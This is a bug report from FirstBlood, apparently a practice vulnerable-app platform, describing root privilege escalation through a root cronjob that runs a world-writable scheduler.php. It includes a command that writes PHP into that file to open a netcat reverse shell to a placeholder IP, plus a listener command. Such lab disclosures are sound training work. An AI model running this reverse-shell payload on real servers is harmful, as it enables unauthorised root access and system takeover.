FirstBlood-#681Root access on the web server
This issue was discovered on FirstBlood v2

On 2021-10-27, shivam18u Level 3 reported:

Hi sean,

I found a way to get root access of the server.

I have mentioned the steps to get RCE with fb-exec account access. With that access we can further get root access.

After getting the fb-exec access, you can see the /app/docker/crontab file.

The crontab runs the scheduler.php file with root access every minute.

So, if we edit the scheduler.php file, we can get reverse shell to our vps.

We can echo the php code with system function to run the required command in scheduler.php.

echo '<?php system("nc IP ADDRESS -e /bin/sh");?>' > scheduler.php

After editing the file, start a listener on your vps.

nc -nvlp 7070

You will get a connection within a minute. You can check the user.

Have a nice day!!


Endpoint: .

Parameter: .

Payload: .

FirstBlood ID: 35
Vulnerability Type: RCE

A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.